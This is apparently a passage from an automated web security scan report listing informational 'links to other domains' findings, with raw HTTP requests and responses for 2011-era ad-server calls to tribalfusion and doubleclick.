//******** jCarousel Lite ( http://gmarwaha.com/jquery/jcarousellite/ ) ******** //
(function($) {
$.fn.jCarouselLite = function(o) {
o = $.ext
...[SNIP]...
<br>' +
'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' +
' codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="' +
google_ad.image_width + '" HEIGHT="' +
google_ad.image_height + '"> <PARAM NAME="movie" VALUE="' +
google_ad.image_url + '">
...[SNIP]...
13.3. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=crenkcom&adSpace=ros&tagKey=2218970080&th=22201705828&tKey=undefined&size=300x250&p=6869973&a=2&flashVer=10&ver=1.20&center=1&addBlockingCategories=Survey|Pop-up|Pop-under|Expandable|Audio|Full-page|Floating|Warning&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&f=0&rnd=6884586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aCntPLO5nZclSE04SQm2X4By88RFFAT03pBuZddHX9UZaZbxujf7rOoybSWIIlj9T71qT7HTFCxEn5rmJjQGIweoYhL7ZcIC46GpoZb0xIxTAFPOWMv0yjjT0DfRmBx7FCOQANcUZcfGgPWejOqO0SAI54ZctxfPcR8iJyjyRw0jNxklmN9DO56PeZbtgSyke8ifZbyolE1wKvZblCmj877varrWIm6OOUmuodrNpbOcEkcvh4HWyZaEVgfD1ei9kXF2kKvKiZbujrlTWZaikFfA7FlrsR5pPLZaGIr3cm7eIMeEDHSj1eGQqHYmZagwfQZcIdZchkGiiZcp9VxgZcRdcnD4lAQe5WW3Bw0USJUuuNpkjXF689ZdpEO3YoXOZaBXZbpx79scc0Zb4LFDeBaA7EZc5HLLeGu23sria8EtmpTUy0x5RC7cZc05samZcaxJcsisCbtj0gg2AcVvfZc88q7pDQTfJ0OCIWLj54FOnLEOpFIZdsSTZd9xmDBdvpDXTEIfulbw4opYeACDD6UU657PNkKoIXNw8IJxPeHv63Ds7Zd7B9eo3uwhvNphv7oNYZbPwgHsuATcxmmd5IGFR4Tmew9woN2MJFE9XW26MABjFeYQu0HPWCfgpJfynY8tCX6XDm7mfBB1fZcnAK2qm4JmbW2SOjtT3uQx2VDtlabL28jFVdLsAB9ZcZbI9uJdvgEavoeH6W29PxmyLyyeN5LtYsvIoI5Cy2AoqNIG0DOPsdbshQZaU0j5Uf86QlDd0HxEZdsALr7okDZdJw2kr9N4dIUcuntgfaYcsquI6y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnteZaRkPN7RyK3AbHMZasF4sP2KljaU43iokocYcZanZaffVfSqVtMFK2IERIZdlS1sxiMGfTECMgE2MA4bLecZcZbesHT1ky6f5n3qpIDfZbnvvVv7VofnZasAYbp9lI784xl4ZcZb6YKwssIJrU5Y2dMSTfx6ZbPNGdZdy49kwUVOZcbZclLbjAhBa6BwnySEfw88clIkZcTwmJp2GabLvbb7oKoGP8UQu131I7ZdhbuEvexVkZcw8lLNsbBUca1Zc0vfnQ6vZdZcV5fa84hJs7LQfxweiawgxBM88rvhvTU6Zcp94EG20YR6D7oPPZdxh1BU8pyAjXvtDaDrvJsVPrGTZaxdwXv9b25uoZdZbX7B9lmVGW8i4PtbTZaF2ZaMs2ZcHXDB6rl2AsBvkZd1tVPdoiZdZdOlDUNXauxqk4WYYyP8m5Eq0pbNpWMDNNdOrdIvygS3ZaSwGFR0Xm2MgbDZbdy9YY5amRCUuT5WHhhwjomrWFsqtL6V3qHQjO27gRRIsVoZd1R8YbdNPCcvNbGGKiVZbgUWcguaiYPdZdAYoOaQCgCOYUDpC1a0pJKE6UilOxa6cmPW1MEr83ZbqCDpZbKVkG1sdvmLBlf6LGPjUMBnKl2e0DE8JolffM5jFO7tgqwbjigs6qnZbZd5scTZdZc1Zc5yZc7ivc2Zb1aZdQp70J2kAvJchH4FwVIZb2UZdZbaoiRFn46qZdFj0ucy2I6RsPryvxeVPYsHv0bqfZd9s5D9OqOGcZcZd6l7AolO182aRZdMxtZboqORJXZdJA67lCBXg4Zd9LS8rGT9JK1RC6uH1Q5qFW2Ue; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 187

document.write('<iframe src="http://routenote.com/blog/TFadvertising/300.htm" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');
13.4. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j.ad?site=crenkcom&adSpace=ros&tagKey=2218970080&th=22201705828&tKey=undefined&size=728x90|468x60&p=6869973&a=3&flashVer=10&ver=1.20&center=1&noAd=1&addBlockingCategories=Flashing|Floating|Warning|Unicast|Audio|Pop-under|Full-page|Pop-up|Survey&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&f=0&rnd=6879781 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnteZaRkPN7RyK3AbHMZasF4sP2KljaU43iokocYcZanZaffVfSqVtMFK2IERIZdlS1sxiMGfTECMgE2MA4bLecZcZbesHT1ky6f5n3qpIDfZbnvvVv7VofnZasAYbp9lI784xl4ZcZb6YKwssIJrU5Y2dMSTfx6ZbPNGdZdy49kwUVOZcbZclLbjAhBa6BwnySEfw88clIkZcTwmJp2GabLvbb7oKoGP8UQu131I7ZdhbuEvexVkZcw8lLNsbBUca1Zc0vfnQ6vZdZcV5fa84hJs7LQfxweiawgxBM88rvhvTU6Zcp94EG20YR6D7oPPZdxh1BU8pyAjXvtDaDrvJsVPrGTZaxdwXv9b25uoZdZbX7B9lmVGW8i4PtbTZaF2ZaMs2ZcHXDB6rl2AsBvkZd1tVPdoiZdZdOlDUNXauxqk4WYYyP8m5Eq0pbNpWMDNNdOrdIvygS3ZaSwGFR0Xm2MgbDZbdy9YY5amRCUuT5WHhhwjomrWFsqtL6V3qHQjO27gRRIsVoZd1R8YbdNPCcvNbGGKiVZbgUWcguaiYPdZdAYoOaQCgCOYUDpC1a0pJKE6UilOxa6cmPW1MEr83ZbqCDpZbKVkG1sdvmLBlf6LGPjUMBnKl2e0DE8JolffM5jFO7tgqwbjigs6qnZbZd5scTZdZc1Zc5yZc7ivc2Zb1aZdQp70J2kAvJchH4FwVIZb2UZdZbaoiRFn46qZdFj0ucy2I6RsPryvxeVPYsHv0bqfZd9s5D9OqOGcZcZd6l7AolO182aRZdMxtZboqORJXZdJA67lCBXg4Zd9LS8rGT9JK1RC6uH1Q5qFW2Ue

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aTnteZaNj6J8me9v6EjRi43mG2ZaiZcZbA5yllyJHgSBmgefnCimBqvljby3Gr9t0TFqZbbpVBG7mrpKfPN3qjumZaFkPIoXnndBuQjjQis22bAx0JdR1xWx4iBP2ZaSlerm5teitpwwn9ZdvtDcEFHrScUBu26yXuDL5UMK275XEdZclVZdDqcjRdvZcZc1yxEhSDHhIPfINaNOB2tCUYE7vkk7irbSo1UPddMbCj76ZcgbSrVOW4xvWmWdXwEVdmvawgJDLGRZc4ZbWKh39N2MUgjuPpyTRUFO4BFWsVsBSU9ZdDeIxdNqqLlZbjCaZbk6sZc2ttJa6bCpBZcwd0q6VSPU02SIYLPRZd1uUk1XYR4vNBAa5HTZdVuHsUlYq5FxxnZd38kTgDK1ourDejHiFGNZdNnhAoOIyog5YXt9oJTUeX4W01R9eyRyihBXlxxZc5hxKNnZduXBTuZdFxGPD0XDKiVc6HLWmSTcprJCBVbX4qaxF0OieTqJ1GkqZdBtpG9lgJYoL0yBcWobNxd2OLWQZdgaqpJKWBgZcp6ZaoQqxiZaYbi2ihoCFuQH2vQL9sTehVNcFTvVJyBZd0rlHPZdb1pdCNu4smHLcMYtHZackWZaidr80Dn1CukNKGl8ZaobvOBILU7ZcItUXvSd6u49PQ5hJX6Qg3ZdvQKWpiUZckGfiKuV1qH1Rc3TPZdJlZb8Lmcmt2oLxikuNYRgT8aZaquEx0u9sT5yJe1oZb5n8VnNdOrJiRZcaGsTfMytZaNxUhDaqLI00QSUmds679ZcqiLsdtdK2TBKZd1qVKHdjSCpMrtc; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:30:07 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 177

document.write('<iframe src="http://adphilia.com/ads/adsense728.htm" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');
13.5. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7098
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Thu, 12 May 2011 13:28:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A"><img src="http://s0.2mdn.net/2524173/BRAND_MEDLAR_NETWORKING_NA_300x250_A.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013"></script>
...[SNIP]...
13.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5362797.34

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6296.126265.CASALE/B5362797.34;sz=300x250;click0=http://c.casalemedia.com/c/4/1/84483/;ord=378452145 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6565

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Apr 28 10:09:16 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
38%3B2-0%3B0%3B61693702%3B4307-300/250%3B41924357/41942144/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/4/1/84483/http://www.enciendetefios.com/en/bundles/?CMP=BAC-MXT_D_Q2_F3_H_Q_N_X799#bundle-001"><img src="http://s0.2mdn.net/2993653/acq_fios_3x_ThisIsItGF _standard_300x250_20110417.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5362797&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=61693702&advid=2993653&sid=953446&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_804/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...
13.7. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/abt.newsissues/newsissues_urbanlegends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/abt.newsissues/newsissues_urbanlegends;svc=;site=urbanlegends;t=26;bt=1;bts=1;pc=1;auc=1;fd=1;fs=0;sp2=0;go=9;a=;kw=;chan=newsissues;syn=about;tile=1;r=-2;dcopt=ist;sz=728x90;u=B5CDUi2520kA1h032128;dc_ref=http%3A//urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm;ord=1B5CDUi2520kA1h032128 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7785

<html><head><title>Click Here!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><center><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights r
...[SNIP]...
<!-- Code auto-generated on Tue Apr 12 16:48:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
http%3A//urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm%3B%7Eaopt%3D2/1/3b/1%3B%7Esscs%3D%3fhttp://www.schwab.com/public/schwab/home/account_types?bmac=pqu&dsid=mult"><img src="http://s0.2mdn.net/2530996/7-Switcher_GIFs_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
13.8. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/abt.newsissues/newsissues_urbanlegends

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/abt.newsissues/newsissues_urbanlegends;svc=;site=urbanlegends;t=26;bt=1;bts=1;pc=1;auc=2;fd=1;fs=0;sp2=0;go=13;a=;kw=;chan=newsissues;syn=about;tile=3;af=1;r=-2;sz=336x280;u=B5CDUi2520kA1h032128;dc_ref=http%3A//urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm;ord=1B5CDUi2520kA1h032128 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7768

<html><head><title>Click Here!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><center><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights r
...[SNIP]...
<!-- Code auto-generated on Tue Apr 12 16:47:36 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
http%3A//urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm%3B%7Eaopt%3D2/1/3b/1%3B%7Esscs%3D%3fhttp://www.schwab.com/public/schwab/home/account_types?bmac=pqu&dsid=mult"><img src="http://s0.2mdn.net/2530996/10-Switcher_GIFs_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...
13.9. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.blogs/bizfeed/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.blogs/bizfeed/index;blg=bizfeed;pg=index;pos=728leader;tile=1;sz=728x90;ord=04734282?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1307

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/ULA/iview/312602161/direct/01/2533531?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/l%3B239998933%3B0-0%3B3%3B31663029%3B3454-728/90%3B41780115/41797902/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
3Dv8/3b05/3/0/%2a/l%3B239998933%3B0-0%3B3%3B31663029%3B3454-728/90%3B41780115/41797902/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/ULA/go/312602161/direct/01/2533531" target="_blank"><img border="0" src="http://view.atdmt.com/ULA/view/312602161/direct/01/2533531" /></a>
...[SNIP]...
13.10. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.blogs/bizfeed/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.blogs/bizfeed/index;blg=bizfeed;pg=index;pos=336showcase;tile=2;sz=336x280;ord=04734282?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1311

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/ULA/iview/312602163/direct/01/2448515?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/u%3B239998806%3B0-0%3B3%3B31663029%3B4252-336/280%3B41780085/41797872/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
Dv8/3b05/3/0/%2a/u%3B239998806%3B0-0%3B3%3B31663029%3B4252-336/280%3B41780085/41797872/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/ULA/go/312602163/direct/01/2448515" target="_blank"><img border="0" src="http://view.atdmt.com/ULA/view/312602163/direct/01/2448515" /></a>
...[SNIP]...
13.11. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=336showcase;tile=2;sz=336x280;ord=77720659?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1311

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe src="http://view.atdmt.com/ULA/iview/312602163/direct/01/2354359?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/m%3B239998806%3B0-0%3B1%3B28183100%3B4252-336/280%3B41780085/41797872/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3f" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">
<script language="JavaScript" type="text/javascript">
...[SNIP]...
Dv8/3b05/3/0/%2a/m%3B239998806%3B0-0%3B1%3B28183100%3B4252-336/280%3B41780085/41797872/1%3B%3B%7Eaopt%3D2/1/64/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/ULA/go/312602163/direct/01/2354359" target="_blank"><img border="0" src="http://view.atdmt.com/ULA/view/312602163/direct/01/2354359" /></a>
...[SNIP]...
13.12. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659?;c=win7 HTTP/1.1
